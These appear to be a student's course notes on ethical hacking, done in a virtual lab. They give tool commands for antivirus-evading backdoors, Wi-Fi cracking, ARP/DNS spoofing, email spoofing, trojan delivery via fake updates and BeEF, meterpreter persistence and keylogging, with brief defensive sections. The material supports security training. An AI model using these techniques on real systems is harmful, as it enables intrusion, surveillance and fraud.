CEH
Installing Veil Framework (Client side)
- A backdoor is a file that gives us full control over the machine that it gets executed on - Backdoors can be caught by Anti-Virus programs - Veil is a framework for generating undetectable backdoors "apt-get install veil" will get the application After that installation, do "veil", and do "y". There is going to be a lot of installation popups, just hit next etc. with the default settings. You can uncheck one of the Autolt boxes when it asks If you want to see release notes. After the full installation, you can do "veil" do access it. "list" will show Evasion which generates the backdoor, and Ordinance, which generates the payload used by Evasion. "use 1" to use Evasion from the list. then do "list" to list all the payloads A payload is made out of: [programming language]/[type of payload]/[method used to establish connection] types of payloads: Reverse payload - connects from the target computer to our computer, and it will bypass firewalls and antivirus programs Binding payload - target listens to a certain port for incoming connections from the attacker some payloads creates a payload that injects another payload, used to bypass certain security measures. ANYWAYS, do "use 15" to use #15 of the list of payloads, which is go/meterpreter/rev_https in another terminal, do ifconfig and find your IP back to the other terminal, "set LHOST [ip address]' use a different port then what the payload is going to run, so use 8080 since it will bypass firewalls. "set LPORT 8080" do "options" too see it the required options updated. the way antivirus programs detect malware is that they have a very large database of signatures, these signatures correspond to harmful code. to make the backdoor appear different and bypass even AVG, set processors to a small value. "set PROCESSORS 1". also do "set SLEEP 6". This all has no real reason, it just makes the backdoors appear different and can bypass similar Signatures. to generate it, do "generate". then name the backdoor. Now you can check it, so go to a website called "www.nodistribute.com". click on browse, and go to the location mentioned at the veil command when you generated. It will show what antivirus programs it bypasses. You want to keep playing around with payloads and other features set like sleep and processors to be able to bypass as many antivirus programs as possible Be sure to update your Veil from time to time, since antivirus programs also update theirs so you need up to date backdoors that will work
Introduction to WPA/WPA2 - cracking with WPS
- Both can be cracked using the same methods - Made to address the issues in WEP - Much more secure - Each packet is encrypted using a unique temporary key - Packets contain no useful information You can crack WPA/WPA2 if WPS is enabled: - WPS is a feature that can be used with WPA/WPA2 and allows clients to connect without the password - Authentication is done using an 8 digit pin where we can try all possible pins in relatively short time which can be used to compute the actual password - WPS attack only works if the router is configured not to use PBC (Push Button Authentication) "wash --interface [wireless interface in monitor mode]" will show all local networks with WPS enabled and data about it first ask reaver to brute-force "reaver --bssid [BSSID value] -- channel [channel #] --interface [wireless interface] -vvv --no-associate" then right after while reaver is running, run a fake authentication attack "aireplay -ng --fakeauth 30 -a [BSSID value] -h [mac address of wireless interface from ifconfig and replace (-) with (:)] [wireless interface]" (if the brute force is failing, then it could be that the version your using with reaver is buggy, so get an older version of reaver from Lecture 24. after downloading, do "cd Downloads/", then "chmod +x reaver". At last, stay in the download directory and copy the reaver command, but instead of reaver at the beginning, do ./reaver.) Then if the attack works, it will give you the WPS pin and the password for the network
Targeted Packet Sniffing
"airodump -ng --bssid [targeted BSSID value] -- channel [channel number of specified BSSID] --write test [your interface name]" will sniff the data of the specified network and put the output of the data to a file called "test". It will show all the connections that is connected to the targeted network Press Ctrl + C to stop the sniffing. Do "ls" to show the test files. the test-01.cap file will show anything send, but will be encrypted with the specified encryption "wireshark" will run wireshark as the application. You can use wireshark on test-01.cap to dump out the encrypted data
Packet sniffing basics
"airodump -ng [name of wireless adapter in monitor mode]" is a packet sniffer and will capture packets, showing all the wireless networks around us, showing detailed information about it on monitor mode you have to base your airodump from a wireless adapter in monitor mode, or it wont pick things up and it wont work PwR is the signal strength, the higher the number, the stronger the signal. This will also go into negative digits so the lowest negative would have the strongest signal. Signal strength correlates with how far you are to that specific network Beacons are frames send by the network will always send those frames to broadcast its existance #Data is the number of data packets #/s is the number of data frames collected in the past 10 seconds CH is the channel that the network works on MB is the maximum speed supported by the network ENC is encryption (OPN is a open network) CIPHER is the cipher used like CCMP, WEP AUTH is the authentication used on that network
Mac address change
"ifconfig [interface name like wlan0] down" will disable it "ifconfig [interface name] hw ether [mac address you want to change to]" will change your mac adress to what is requested, but you have to turn off your wlan0 first, change it and then turn it on. Changing mac address will only work in memory, and once restarted, will reset back to original. If it changes back before you restarted it, then it has to do with your settings. "ifconfig [interface name] up" will turn it on
The Terminal & Linux Commands
"pwd" prints the current directory "ls" prints all the directories in the current directory "cd [directory name]" will put you inside the directory "cd .." will put you back up one branch in the directory "man ls" lists the manual for ls, can be used for many other commands "-a", or "--all" will do the same thing, which will list all pressing up or down shows previous commands pressing tab does auto-complete "apt-get update" will update the list of programs you can install "apt-get install [app name]" will download the application FYI: - All switches added to a syntax are optional to the line of command
Backdooring any file type (Client Side)
- Combine backdoor with any file in a generic solution - Users are more likely to run a pdf, image or audio file than an executable - Works well with social engineering - Its basically a trojan How? Use a download and execute payload that would: 1. Download a normal file (image, pdf, etc.) and display it to the user 2. Download the evil file and execute it in the background Download and the execute payload in the resources. Double click if and edit the Local urls and put the file url in there. Like take an image from url, copy that url and put it on the local files with quotation marks around it. Then for multiple urls, just do a comma to it within the quotation marks at the end of the url, where you can put the backdoor url. The script wont work if you don't use direct urls. Afterwards, rename the extension of the file so, .txt to .au3. Open the compiler application which you can find when you search up compiler. Put the source file to the script file and leave the destination file as it as exe. You can also download a icon from IconArchive. It is best tho if you go to a website like "www.rw-designer.com/image-to-icon" which lets you set an image and turn it to a icon. Use the same image you put in the script. You want to send the exe file to the target, so change the name to something more appealing. You want to put it on your kali webserver at /var/www/html/evil-files. Listen to incoming connections at Metasploit. After you finished the Metasploit exploit, you can go to the windows machine. go to your search engine and search up the file location at "http://[IP of kali]/evil-files/gtr-image.exe" and then save the file. Open your files and open the file. Now you have access to it. You can try with "sysinfo" at the kali machine. Spoofing .exe Extension to any extension (jpg, pdf, etc.): On your kali machine, copy the .exe file name generated before and put it on a leafpad. Then, decide on what extension you want and write it down. Now write the extension from right to left, so like jpg = gpj. Say the file name is gtr.exe, you take the gpj and put it in between the name and the period, so gtrgpj.exe. Go to applications and type "characters". in the program, search for "right-to-left override". Click the Copy character. then go to the leafpad and using the previous example, click in the middle here "gtr^gpj.exe" and paste it. Now it should be called "gtrexe.jpg". Now highlight the whole thing and copy it. Rename the file to that highlighted text. You can be tricky about it using words that end with "exe", stuff like flex, sex, etc. Don't send the file just as it is because browsers will remove the right-to-left trick. Instead, archive the file, so compress it. Copy it and paste it on your evil files. Listen to incoming connections, go to your windows machine and go to "[kali IP]/evil-files/gtrexe.zip", save it and uncompress it. Now you can run it and your backdoor will be executed where you can test it with "sysinfo"
WPA/WPA2 Cracking part 1
- Fixed all weaknesses in WEP - Packets contain no useful data - Only packets that can aid with the cracking process are the handshake packets - These 4 packets are sent when a client connects to the network run airodump on your interface, then run airodump on the specified network to a file called for this scenario "handshake-01" Now you can either wait for someone to connect to the network and capture the handshake, or run a very short deauthentication attack of someone who is connected to the network just enough to have it send a handshake like so "aireplay -ng --deauth 4 -a [mac address of target network] -c [mac address of client you want to disconnect] [wireless interface]". You have to run the deauth while you have airodump open. Now you have the handshake packets
Social Engineering (Client side)
- Gather info about the user - Build a strategy based on the info - Build a backdoor based on the info Maltego: Maltego is an information gathering tool that can be used to collect information about anything - Target can be a website, company, person - Discover entities associated with target - Display info on a graph run Maltego on a tool application on kali and create a account. Transformers are plugins that help you gather information based on certain things. Create a new graph on the utmost top left. The left column will show different entities under categories you can put in. On the bottom right, properties based on the entity selected will show, which you can edit. You can run transformers when you right click on the entity. For example. Create a person, call it Zaid Sabih, run a transformer that will use websites (using search engines). Then it will ask if you want to look for a specific domain name, which you can just but spaces on them if you don't them, which you should for this example. Website entities will branch out of the person in the graph and show all the websites that are associated with the name. If this was a real circumstance, you would go under each of them and try to find what is related to that person. If it isn't related to that person, you can just delete it to make it more cleaner. You can copy certain sections of the URL that can help like profile etc. It builds up from little information to a lot. Information found can be reimplemented into the graph and it will keep growing with information. Sometimes you have to log in to social media sites and such to expand certain aspects of the information gained. If 2 entities are linked, you can click and drag 2 entities to initiate a arrow so the graph appears better and cleaner. You can target a person by impersonating a website manager, impersonating its friends, and much more and be a trojan with a backdoor. You can also hack into friends or other branches and then try to target the main target. Social engineering goes endless
Spoofing Emails (Client side)
- Send fake emails - Looks like it's sent from any address - Pretend to be a friend, company, boss ...etc - Friend > ask to open a file (image, pdf ..etc) - Support member > ask to login to control panel using fake login page - Support member > ask to run a command on server - Ask to visit a normal web page - ...etc Using the resource gathering from Zaid before, we'll try to compromise into [email protected] using the emails of his friends. There are a lot of websites when you search up "spoof emails online" that will spoof emails but it will end up as spam and not in the inbox. Big companies like google have blacklisted spoof email websites and will be marked as spam. To bypass it, you can use your own web server, or you can sign up for a free web hosting plan, or sign up for a SMTP server. Either way, if your using a paid service, it will be a lot less likely to be flagged as spam First method: SMTP server www.sendinblue.com is designed for email marketing and companies to communicate with their customers. Sign up for it (long process) and then select the free plan. Click on "transactional" which will show all the information that is needed to authenticate with the SMTP servers. Now you need a program to authenticate an send emails. On kali, do "sendemail --help" to see what it does. We will be setting the information for it from the transactional page. Upload your complete trojan to any file sharing service like dropbox, and then share > copy link of the file. paste the link on a tab and edit the url where you change the 0 to 1 at the end of the url so it automatically downloads. Then copy that url. longass command: sendemail -xu [given login] -xp [given password] -s [given SMTP server]:[given port number] -f "[email that is being sent from]" -t "[target email]" -u "[title message]" -m "[message you want to send + url mentioned above]" -o message-header="From: [name you want to appear] <[email that is being sent from]>" breakdown: Using a program called sendemail. The command is split between 2 stages, the first stage being where we authenticate with the email server like logging in to gmail. Second stage Is to actually compose to email and to attribute its from and to email location. Then we use a advanced option to set the message header that will appear on the inbox. Now you can run the Metasploit listening command and then open the file email and file on your windows machine. to test it on your kali machine of course do "sysinfo" Second method: Web Hosting Download the resources on this lecture www.000webhost.com will allow you to use a free web hosting service. Sign up or log in with google. go through the wizard, click "other", skip, and then name your project. Now upload your site, then click public_html. Click upload button and select the downloaded file. Right click and view the selected file once its shown. Now fill out the spoof email. Btw, make sure the email "from" is a email that is linked with the target email. Btw, "Name" is the header that will show, so set it to the persons full name.
WPA/WPA2 Cracking part 2
- The handshake does not contain data the helps recover the key - It contains data that can be used to check if a key is a valid or not - Using a wordlist, you can check with the key in order to see if the word is valid or not to the key Crunch can be used to create a wordlist Syntax: "crunch [min # of char] [max # of char] [list of characters used] -t[pattern like starting with C] -o [Filename to store] ex: "cruch 6 8 123abc$ -o wordlist -t a@@@@b" (start with a, end with b) "man crunch" shows all the options you can use with it which are really useful "crunch 6 8 abc12 -o test.txt" will generate a word list with characters between 6 and 8, using the characters of abc12 and is located in test.txt "cat test.txt" will dump out the wordlist
Information Gathering (Server Side)
- Try default password (ssh iPad case) - Service might be mis-configured, such as the "r" service. Ports 512, 513, 514 - Some might even contain a backdoor! - Code execution vulnerabilities Use Zenmap to find services and possible vulnerabilities to a certain IP. Like exploiting the metasploitable FTP open port that allows anonymous logins. You can google ports that you dont know and try to exploit them. You can download programs and clients with "apt-get install [program or client]". In this scenario, zaid got into metasploitable with a remote access that is from a misconfiguration from port 512/ rservice which allowed anonymous root access from another machine.
Client Side Attacks
- Use if server side attacks fail - If IP is probably useless - Require user interaction - Social engineering can be very useful - Information gathering is vital
Pivoting
- Use the hacked device as a pivot - Try to gain access to other devices in the network To set this up, go to preferences in your VM, go to network and add another NAT network. Set the network CIDR to your other NAT network IP and set it like this but replacing X with your current value "X.X.X+1.0/24" And call that NAT network Something else. Now set the metasploitable machine to the new NAT network, keep the kali machine as it is, and for the windows machine, add another network adapter and put the new NAT network there. So kali has NAT network one, metasploitable has NAT network two, and Windows has both NAT networks. The kali machine wont be able to ping the metasploitable machine, vice versa. Assuming you already have a session with windows machine and trying to exploit a device that is not visible to the kali machine, test that and do "use exploit/multi/samba/usermap_script", then "show options" and "Set RHOST [metasploitable IP]" "show payloads", and pick the payload "set PAYLOAD cmd/unix/bind_netcat" and "show options". If everything is set, do "exploit". Now the exploit should fail since you cant see the metasploitable machine. Interact with the meterpreter, so "session -I [ID]". check the networks that the target computer is connected to with "ifconfig". Look for a interface that is on a different network, which should be metasploitable. We will try to set a route between that subnet and our subnet. Copy the metasploitable IP. "background" your current session, then do "use post/windows/manage/autoroute" (Btw, if you ever want to see all the modules of a certain path stage, like "post/windows/manage/", then write that path and then double tab to see all the available modules with that path) "show options". Now you need to set the session and subnet. so "set SESSION 1" and "set SUBNET [subnet of metasploitable IP, so X.X.X.0]". Then do "exploit". Now you have a connection to the windows machine AND a route between their network and your network. Now you can do the same exploit you have one before, so "use exploit/multi/samba/usermap_script", "show options" to check and then "exploit". The command shell on session 2 should be opened now. try "id", "uname -a" to see if your in the metasploitable. You can do any Linux command and have full access. This method is a much safer choice then uploading something on the windows machine. Metasploit is really big and we only covered a very small part, so feel free to try stuff out. Now Skiddadle my dude :)
Wireshark
- Wireshark is a network protocol analyser - Designed to help network administrators to keep track of what is happening in their network How does it work? - Logs packets that flow through the selected interface - Analyze all the packets When we are the MitM, Wireshark can be used to sniff and analyze traffic sent / received by targets you can sniff data with MitM, then analyze them later with wireshark Theres going to be a lot of data, so filtering will be useful. if you want to look for usernames and passwords, filter for HTTPS, and look for POST packets with the appropriate website you want to look for. Click the packet and look for Hypertext Transfer Protocol, under that look for HTML form URL encoded and that is where the username and passwords should be located you can do Ctrl + F to find anything within the captured packets. really useful. in the "whatever.cap" file, you can put something between the second to last line and put in "set net.sniff.output [file location]" to put it in a specific file and put it in wireshark to analyze it
Introduction to Post-connection attacks
- Work against WiFi & Ethernet - Gather more info - Intercept data - Modify data on the fly
Maintaining Access
3 methods to maintaining access: - Veil-evasion (does not always work) - persistence module (detectable by antivirus programs) - metasploit + veil-evasion (robust + undetectable) Veil-evasion method: You can use either rev_http_service or rev_tcp_service. You can use that instead of a normal backdoor, or upload and execute it from meterpreter Persistence module: in meterpreter, do "run persistence -h" to see what options you can use for creating a persistent backdoor on a target host. "run persistence -U -i 20 -p 80 -r [kali IP]" will run it under user privlidges, reconnect every 20 seconds, on port 80 to your IP. If you want to receive a connection, you need to use multihandler and use the selected payload metasploit + veil-evasion: background the current session, and do "use exploit/windows/local/persistence" and then "show options". EXE_NAME is the name that will show up as the processes. So its good to change it "set EXE_NAME browser.exe" "session -l" will list all the sessions open currently. do "set SESSION [ID number]". "show options", now do "show advanced" that will show advanced options for the particular module. "set EXE::Custom /var/www/html/backdoor.exe. Do "show advanced" to see if its there, then you can do "exploit". Keep in mind, at the end of the exploit, it will give you a RC (Resource) file that you should copy and save it somewhere, and this will allow you to delete the backdoor that was uploaded just now. Kill all the sessions with "session k". now do "use exploit/multi/handler" and then you can "exploit" to gain connection again. The benefit of it is that the backdoor can still be exploited and executed even after the windows computer has turned off and turned on
DNS Spoofing
> the DNS server is given information about a name server that it thinks is legit when it isn't "service apache2 start" which will start the apache2 web server built in kali first, run "bettercap -iface [interface] -caplet whatever.cap" then choose a website you want to land on when it gets redirected within bettercap, you can do "help dns.spoof" to find out how to to do it clearly do "dns.spoof.all true", then "set dns.spoof.domains [website name], [you can add others and a star as a wildcard like *.google.com, meaning any subdomain applies in the place of the star] then "dns.spoof on" works with every website besides hsts
ARP poisoning
ARP (Address Resolution Protocol) is a simple protocol used to map IP addresses of a machine to its MAC address When a host needs to communicate with another client, it will use the ARP protocol that sends out a broadcast ARP request asking who has that IP address, and the appropriate device will respond with the MAC address with a ARP response each host has a ARP table, shown with "arp -a" ARP spoofing (in MitM) is when the hacker device pretends to be the gateway router in the perspective of the victim, and also pretends to be the victim in the perspective of the gateway router Why ARP spoofing is possible: - Clients accept responses even if they did not send a request - Clients trust response without any form of verification
Bettercap Basics
ARP Spoofing using Bettercap: - Framework to run network attacks - Can be used to: > ARP spoof targets (redirect the flow of packets) > Sniff data (urls, usernames, passwords) > Bypass HTTPS > Redirect domain requests (DNS Spoofing) > Inject code in loaded pages > more... "bettercap -iface [interface]" will use bettercap mode "net.probe on" will discover other devices on the network. It will automatically turn on net.recon You can see running programs in Modules within "help" "caplets.show" will show all the caplets that you have and the location of it "net.show" will show all connected clients in the network with specific details "help [bettercap command]" will explain the command "arp.spoof.fullduplex" attacks both the router and the victim if you want to set/modify a parameter or command, the command for it is: "set [the command] true" for arp spoofing: "net.probe on" "set arp.spoof.fullduplex true" "set arp.spoof.targets [target IP]" "arp.spoof on" do "help" to make sure that arp.spoof, events.stream, net.probe, net.recon are running
Intercept data with ARP spoofing
ARP spoofing using arpspoof: - arpspoof tool is used to run arp spoofing attacks - simple and reliable - Ported to most operating systems including Android and iOS - Usage is always the same "arpspoof -i [your interface ex: eth0] -t [target IP] [gateway IP]" tells the victim that you're the router "arpspoof -i [your interface ex: eth0] -t [gateway IP] [target IP] tells the router that you're the victim a security feature in linux will stop the flow of data to the router, so you need to enable port forwarding so it will allow packets to flow through it: "echo 1 > /proc/sys/net/ipv4/ip_forward"
Gaining Access Introduction
All devices are computers and have OS like: - phone - TV - laptop - web server - website - network - router 2 main approaches Server Side: - Does not require user interactions, all we need is a target IP - Start with information gathering, find open ports, OS, installed services, and work from there Client Side: - Require user interaction, such as opening a file, a link - Information gathering is key here, create a trojan and use social engineering to get the target to run it
Detecting Trojans (Client Side)
Analysing trojans: - Check properties of the file - Is it what it seems to be? - Run the file in a virtual machine and check resources - Use an online Sandbox service If you go to the properties of a trojan file, it will show was a application, and not what the trojan pretends to be Rename it and it will change back to original if it was a trojan. Also Windows will tell you if its running a executable when you try downloading it Resource Monitor will tell you all your open ports and tells you what the remote address and remote port its comming from. If you plug in the remote address to the search engine and if its an attacker, it will most likely not pull up a website. If can search up "reverse dns lookup" and plug in the suspicous IP and it will tell you the domain. www.hybrid-analysis.com is a sandbox where you can upload a file and it will tell you if there are malicious indicators. If you pay for it, you can see what the malware is. You dont need to pay to figure out its a bad file just by analyzing the data.
Creating a Fake Access Point (Honeypot)
Another method to become MitM besides ARP spoofing is to become a fake access point where you act like the router and receive all the requests from the clients. Needed: - Wireless adapter that supports AP mode - Any interface with internet access The tool kit we will use since we are the skid that we are imma rite imma rite is using Mana-Toolkit: - Tools run rogue access point attacks - it can: > Automatically configure and create fake AP > Automatically sniff data > Automatically bypass https Mana has 3 main start scripts: 1.) start-noupstream.sh - starts fake AP with no internet access 2.) start-nat-simple.sh - starts fake AP with internet access (most commonly used) 3.) start-nat-full.sh - starts fake AP with internet access, and automatically start sniffing data and bypass https (fails a lot of times) Set your VM to a NAT network, so you can access the internet Now set your wireless adapter to managed mode open your hostapt-mana.conf in the command "leafpad /etc/mana-toolkit/hostapd-mana.conf" and adjust the interface to your specific wireless adapter, usually wlan0. Also change your SSID to your desired name. open the script by the command "leafpad /usr/share/mana-toolkit/run-mana/start-nat-simple.sh" change the upstream to your internet access, usually eth0 change the phy to your wireless adapter, it will say wlan1, and it's usually wlan0 Now execute that file. If you want to execute and not modify the code within the path, do bash, so: "bash /usr/share/mana-toolkit/run-mana/start-nat-simple.sh" sometimes there's an error when running that command, so run it again Do not test the connection from the host machine, since that VM is getting its internet connection from the host. Instead, test it from a different VM or another device. Now anything you do on that device through the internet will have to go to the fake access point. Now use Wireshark in the hacker machine.
Backdoor delivery method 1 (Client side)
Backdoor delivery method 1: Spoofing Software updates - Fake an update for an already installed program - Install backdoor instead of the update - Requires DNS spoofing + Evilgrade (a server to serve the update) summary: 1. Download and install Evilgrade using instructions in the resources 2. Start Evilgrade 3. Check programs that can be hijacked 4. Select one 5. Set backdoor location 6. Start server 7. Start dns spoofing and handler (handler is payload method) "cd /opt/evilgrade/" will put yourself in the directory where evilgrade is located "./evilgrade" will run evilgrade while being in evilgrade directory "show modules" will show all the programs where you can hijack their upgrades "configure dap" will put yourself in the dap option do "show options" while in dap and it will show options that we can set. In this scenario, we are changing the agent which initially would be the path of the program that is installed for the program. "set agent /var/www/html/backdoor.exe" will redirect the agent option to the backdoor path we previously build we can also change the endsite, which is the location you'll be redirected to once the update is finished. Initially, it would send to speedbit.com/updateok.html, but since we didn't really execute any updates, it would give an error if that were to run normally. So we are going to change it to just the original site "set endsite www.speedbit.com" "start" will start evilgrade. So if evilgrade gets a update request from that program, it will return with the backdoor file while presenting to be a regular update Now you need to become MitM with any method with a separate terminal Now you need to DNS spoof with bettercap Listen to incoming connections with Metasploit using the payload meterpreter previously mentioned on another termninal Now on the windows machine, you can download DAP (Download Accelerator Plus). go on help, update now and update it. On the terminal that you were listening to incoming connections, you can do "sysinfo" to see if it worked and are able to pull up the windows system information
Backdoor delivery method 2 (Client side)
Backdoor delivery method 2 - backdooring exe downloads - Backdoor any exe target downloads - We need to be in the middle of the connection - has to be HTTP download1 summary: 1. Set IP address in config 2. Start bdfproxy (backdoor factory proxy) 3. Redirect traffic to bdfoxy 4. Start listening for connections 5. Start arp spoofing navigate to bdfproxy on files with (you can do "/" or do "Ctrl + L" to open the path) "/opt/BDFProxy/". change the config file (cfg) so double click and go with leafpad, scroll down and change ProxyMode from Regular to Transparent. Scroll down to WindowsIntelx86 and change the host IP to your kali IP, so it knows where to send the data to. Scroll down to WindowsIntelx64 and do the same thing. Go to the terminal, navigate to where the tool is so "cd /opt/BDFProxy/", then "ls". Green text are executables. execute the tool so "./bdf_proxy.py" It's not going to receive any requests, so first become MitM in any way on a separate terminal, then link BDF to all the data on MitM. We can use IP tables that are rules that packets have to follow so on a separate terminal, write the following "iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080" so bettercap intercepts data, and that will be redirected to BDFProxy and will wait to see if an exe is being downloaded, it will backdoor it and then serve it back to the target. Now you need to listen to incoming connections, with either the multihandler, or use the resource file that the backdoor file creates for us that automatically will listen. So you need to do "msfconsole --resource /opt/BDFProxy/bdfproxy_msf_resource.rc" it will run all the code on the resource file and automatically start the multihandle. once your on multihandler which should be the third terminal, you can begin with the testing. So go on the windows machine and download something simple like speedbit (has to be HTTP) Now go on the kali machine, go to the multihandler and press enter, do "session -l" to display the available sessions which should be the windows system. do "session -i 1" which will use the session of the windows machine displayed with ID 1. now you have control. To verify, you can do "sysinfo"
Injecting Javascript Code
Bettercap with code injection: - Inject Javascript code in loaded pages - Code gets executed by the target browser - This can be used to: > Replace links > Replace images > Insert html elements > Hook target browser to exploitation frameworks > more!
BeEF Overview
Browser Exploitation Framework allowing us to launch a number of attacks on a hooked target. Targets are hooked once they load a hook url. go on applications and go to "beef start". Set a password of your desire. Now a web login page will pop up, where the Username Is beef and password is what you set it to before. the "online browsers" will show see the browsers that are hooked to beEF right now. the "offline browsers" are previously hooked browsers that you hooked To hook a browser to beEF, you have to get the browser to execute a javascript code, so this will work on any browser that works with javascript. The javascript code was displayed at the terminal at "example". Methods to inject the code: - DNS spoof requests to a page containing the hook - Inject the hook in browsed pages (need to be MitM) - Use XSS exploit - Social engineer the target to open a hook page Go to files and go to /var/www/html and right click index.html and open it with leafpad. Replace everything with the code that beEF provided with you which is (check my beEF notes on my acer pc for it) Now start your webserver on your kali machine with "service apache2 start". Now go to your windows machine and go to your webpage at "[kali IP]". Its going to be blank which you can fill with HTML code where you put the hook code at the start or at the end. Go to your beEF application and go check your online browsers. There will be a lot of options and a lot of info shown. At commands tab, you can run various commands on the target We can also use the advantage of being MitM to make every website have the javascript code. Download the custom javascript code in the resources and open the "inject_beef.js". Put your kali IP where its requested and save it. Go to the hstshijack folder at /usr/shre/bettercap/caplets/hstshijack. Modify the hstshijack.cap file and add another hstshijack payload, so add a comma and put a "*:/root/downloads/inject_beef.js". Now you just need to run bettercap with the spoof caplet. run hstshijack/hstshijack. Now you can test it like going to www.stackoverflow.com. Now you have access with beEF Running basic commands with beEF: - "Create Alert Dialog" which will create a pop up window with text - "Raw JavaScript" which will execute any javascript code - "Spyder Eye" which will take a screenshot what the target browser screen - "Redirect Browser" which will redirect the user to the specified url - "Pretty Theft" which will reload the page session and make them type their username and password where they can capture that - "Fake Notification Bar (firefox)" where you implement your backdoor which should be located at var/www/html. rename the backdoor to "update.exe" for appearance purposes. Fill the address of it so "http://[Kali IP]/update.exe". Fill the notification text with something like "critical update for update, click here to install" Before it installs, listen to incoming connections. Sometimes you have to do it multiple times when it doesn't work the first time. Also sometimes after you execute, you need to click on one of the "command" labels. You can also use the filter to search things up quicker.
Deauthentication Attack
Deauthentication Attack: - Disconnect any client from any network - Works on encrypted networks - Dont need to know the network key - No need to connect to the network By changing your own mac address, you can pretend to be the client and ask the router to want to disconnect, then pretend to be the router and tell the client to you requested to be disconnected. This is done by a tool called aireplay "aireplay -ng --deauth 100000000 [mac address of target network] -c [mac address of the target client] [wireless interface] - which which will crash the internet connection of the target. Sometimes this wont work so for gurantee, you should run "airodump -ng --bssid [targeted BSSID value] -- channel [channel number of specified BSSID] -- [your interface name]" on a divided terminal and during that, run the aireplay command for guranteed internet crash. If you want to stop the overflow, you press Ctrl + C. This is commonly done from scammers that pretend your internet is down and implement viruses. Deauthentication attacks are usually done with the addition of other attacks
Preventing MitM attacks
Detection: - Analyzing ARP tables - Using tools such as Xarp - Using Wireshark Problems: - Detection is not the same as prevention - Only works for ARP Spoofing Solution: - Encrypt traffic > "HTTPS everywhere" plugin from the search engines store, doesn't work with websites that only use HTTP. It can see DNS requests, just not the data within that website. > For total security, use VPN to completely encrypt your traffic Benefits of VPN: - Extra layer of encryption - More privacy & anonymity - Bypass censorship - Protection from hackers Be sure you know your VPN provider, since all your traffic is send to the VPN server, and then to the internet. - Avoid free providers - Make sure they keep no logs - Use "HTTPS everywhere" on top of that, so you get certainty of TLS encryption in BOTH your connection the the VPN server and the VPN to the Internet. Overall, solves the problem that VPN servers can see your data
Protecting against smart delivery methods (Client side)
Ensure you're not being MitM'ed; use trusted networks, Xarp, static arp tables Only download from HTTPS websites Check file MD5 after download; Every file downloaded generates a signature. The website will also usually give you a signature. the signature would change if it was altered. WinMD5 is a good tool to use that you have to download. It will ask you to select a file and it will tell you the signature The original signature is given to you by the website downloaded from
Website hacking Exploitation
File Upload Vulnerabilities: - Simple type of vulnerabilities - Allow users to upload executable files such as php Summary: - Upload a php shell or backdoor, ex: weevly 1. Generate backdoor 2. Upload generated file 3. Connect to it 4. Find out how to use weevly
Bypassing HSTS
HSTS: - HTTP Strict Transport Security - Used by Facebook, Twitter and few other famous websites Problem: - Modern browsers are hard-coded to only load a list of HSTS websites over HTTPS PARTIAL Solution: - Trick the browser into loading a different website - Replace all links for HSTS websites with similar links Ex: facebook.com > facebook.corn twitter.com > twiter.com Use the modified version of hstshijack caplet since it includes code that will replace domain names like shown in the example now after you do "bettercap -iface [interface] -caplet whatever.cap", you type "hstshijack/hstshijack", or "hs" and *tab* This will only work if you google facebook and click on the link, instead of searching directly facebook.com on chrome. There's a chance for there to be an error, video resource has a solution.
Outside the Network
If you want to find out your Routers IP, simply look up "whats my IP". You can configure your router to IP forward requests from certain IP addresses outside the router and send it to a specific person inside open "veil-evasion", "list", "use 9", and set the LHOST to the router IP instead of your private IP. Now you can generate it with "generate" and call it "backdoor.exe" Copy the path that it was generated to which it mentioned. On a second terminal, copy that path which is a just a file to your webserver so "cp /var/lib/veil-evasion/output/compiled/backdoor.exe /var/www/html" Now just listen to incomming connections, set LPORT to 8080 and set LHOST to your private IP. We can only control our IPs, so we have to listen to incomming connections to our IP, and we set the IP that will be received to the Routers IP. Now we have to configure the router to whenever he gets a connection from port 8080, he sends it to your IP Usually the router local IP is the first number from your subnet range, so if your private IP is 192.168.0.15, the router local IP would be 192.168.0.1. You can also do "route -n" to show the gateway router local IP. Now plug in the routers local IP to the search engine. Login the router, which is either the default username and password or its on a sticker under the router. Look for IP forwarding and set the public port range to 8080 and target port to 8080. set the Target IP to your private IP. Also set the same IP forwarding but also for port 80 since your apache server is on port 80. Start your Apache server with "service apache2 start". FYI, The windows machine which will be in a separate network, now go to it and search up "[kali router IP]/backdoor.exe". Now you have control over it. Using beEF: Open beEF, use the same hook method, so copy the example script, paste and replace it in /var/www/html at index.html file. Set the router IP and save it. Set IP forwarding and set port 3000 On the windows machine, go to "[kali router IP]" and your windows machine is hooked. If your router supports it, you can even set a DMZ Host which will forward all ports to the IP that is configured.
WEP cracking for idle network
It will take a lot of time to capture enough IVs, so to solve this: -Force the AP (Access Points) to generate new IVs APs only communicate with connected clients: - Associate with the AP before launching the attack Fake Authentication Attack: Show the connections and details about the connection with "airdump -ng --bssid [BSSID value] --channel [channel #] --write lala [wireless interface]". "aireplay -ng --fakeauth 0 -a [BSSID value] -h [mac address of wireless interface from ifconfig and replace - with :] [wireless interface]" this will open the AUTH, so now you can send anything to the network and it will communicate. If you set the fakeauth # to 30, it will associate again every 30 seconds instead of doing it manually Now you have associated with the network, you can send it packets and force it to send data/IV. Be sure to associate with the network using the command every now and then during the cracking This will the most reliable way but there are other options for the attacks mentioned: ARP Request Replay: - Wait for an ARP packet - Capture it, and replay it (retransmit it) - This caused he AP to produce another packet with a new IV - Keep doing this till we have enough IVs to crack the key While having airodump open on a separate terminal, "aireplay -ng --arpreplay -b [BSSID value] -h [mac address of wireless interface from ifconfig and replace - with :] [wireless interface]" this will look for ARP packets and when it finds one, it will keep generating IVs "aircrack -ng arpreplay-01.cap" will try to crack the key from that file
Post Exploitation
Metasploit Meterpreter Basics: > help - shows help and commands > background - will minimize your current session so you can do other exploits > session -l - will show all your sessions > session -i [ID number] - will put you into the requested session > sysinfo - shows information of target computer > ipconfig - shows all interfaces connected to target computer > ps - lists all processes running on the target computer Its important to migrate to a process that is less likely to be terminated so you can compromise his machine longer. So its good to migrate to a process more lasting like explorer.exe which is the GUI of windows and that only terminates when you shut down your pc. > migrate [process ID] - will migrate the current connected process to the selected one > pwd - current path directory > ls - list current files under directory > cd [file or folder] - changes directory > cat [file] - opens file > download [file] - downloads the file into your own machine > upload [file] - will upload a file on your machine into his > execute -f [file] - will execute the file on his machine > shell - converts the meterpreter and opens the windows command line > keyscan_start - will record every key stroke. > keyscan_dump - will dump the recorded keystroking > keyscan_stop - will stop the keystroking > screenshot - will take a screenshot of the target screen - and many many more commands that show when you do "help"
Metasploit (Server side)
